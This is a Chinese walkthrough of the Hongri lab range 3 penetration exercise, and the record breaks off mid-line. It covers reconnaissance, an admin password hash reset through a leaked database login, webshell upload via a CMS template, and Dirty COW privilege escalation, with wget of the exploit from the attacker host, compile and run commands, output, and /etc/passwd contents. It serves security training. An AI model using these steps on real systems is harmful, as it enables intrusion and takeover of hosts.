红日安全靶场3

                          红日3 

环境准备

1、所有虚拟机已经自动挂起。且内网网段为192.168.93.0\24，外网网段为dhcp，不需要更改

2、修改VMnet2的ip为192.168.93.0网段，没有就创建。

因为校园网问题，桥接模式无法上网，为了方便，外网网卡改为net模式，并配置192.168.1.0网段，如下所示：

修改kail的ip以及dns

初始信息收集

扫出来了一些端口

直接访问80端口，貌似找不到有什么可利用的点。尝试目录爆破。目录爆破可以用kail自带的dirsearch、也可以尝试用awvs做一个全面的大保健。

这里利用AWVS:,其中包含目录、文件泄露

访问

拿下第一台机器

首先对

http://192.168.1.128/index.php/author-login

http://192.168.1.128/administrator/

进行暴力破解，没有成功。

但根据泄露的数据库信息，尝试连接数据库

用centos7的mysql连接失败了~~但利用Navicat Premium16成功了~

寻找用户名密码；一般都会有users字样。。发现是加盐了的md5。拉到md5网站破解，失败。但还是通过万能的互联网找到破解的方式，把密码修改为

$2y$10$EJ64ugc3YEnGH2jaM06XCO68igbTx4LpkcfVPnzoJHRy8Wm8h0Hti 

明文为123456；记得保存原密码，养成习惯。当然，实战过程中，最好利用增加的用户登录。

成功进入了后台。

找到模板

创建一个新的文件：写入木马

访问/administrator/shell.php / /失败

但查看目录扫描的结果，可以猜测可能在templates/beez3/目录下

访问ip/templates/beez3/shell.php验证

通过蚁剑也成功连接

上传msf制作的shell.exe，但打开终端，发现权限太低了，根本没办法运行程序。

可能是受disable_functions的影响，利用蚁剑的disable_functions插件尝试绕过（失败了）

没办法再次求助于博客

在/tmp/mysql/ 目录下有个test.txt文件 #据说tmp文件通常有重要文件泄露

并且在前面这台机器是开启了22端口（ssh服务）

尝试进行连接，成功进行连接

发现与webshell不通用文件，所以无法找到webshell传进行的木马。本来想用xftp进行传进去，但考虑到这是个普通用户并没有权限下载ftp，于是先尝试能不能进行提权。uname -a 查看内核版本。

低于以下版本表示存在脏牛漏洞(CVE-2016-5195)

Centos7 /RHEL7    3.10.0-327.36.3.el7
Cetnos6/RHEL6     2.6.32-642.6.2.el6
Ubuntu 16.10         4.8.0-26.28
Ubuntu 16.04         4.4.0-45.66
Ubuntu 14.04         3.13.0-100.147
Debian 8                3.16.36-1+deb8u2
Debian 7                3.2.82-1

参考自脏牛（Dirty Cow）快速指南-阿里云开发者社区

于是把脏牛工具包弄到kail上，kail开启服务，然后靶机进行下载。但很神奇，下载的竟然是一个网页。只能通过压缩的形式进行下载了，但需要unzip对zip格式进行解压，万幸，靶机拥有unzip。

kail ： python3 -m http.server 8000     
​
靶机：wget http://192.168.1.123:800/dirtycow.github.io-master.zip
​
靶机：unzip dirtycow.github.io-master.zip -d zangniu 

失败样例：

可以看到他是一个目录，但打开只有一个网页

靶机情况：

查看是否拥有gcc，没有也可以通过先编译再上传到靶机

经过无数次的踩坑：

终于找到一个成功的

GitHub - firefart/dirtycow: Dirty Cow exploit - CVE-2016-5195

同样，靶机通过kail下载出来，上面有写；

# gcc -pthread dirty.c -o dirty -lcrypt  #编译
​
#./dirty   root      #因为已经存在/tmp/passwd.bak 会失败
​
#rm -f /tmp/passwd.bak 
​
#./dirty   root   #root 为密码， ./dirty  密码

​
##提示信息，，他创建了一个新用户firefart，密码为root，这个用户拥有root权限
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: root
Complete line:
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
​
mmap: 7fcfe9a6b000
madvise 0
​
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password 'root'.
​
​
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd

证明1：
[firefart@localhost dirtycow-master]# cat /etc/passwd
firefart:fiw.I6FqpfXW.:0:0:pwned:/root:/bin/bash
/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt

证明2：
[firefart@localhost wwwuser]# echo 123 >1.txt
[firefart@loca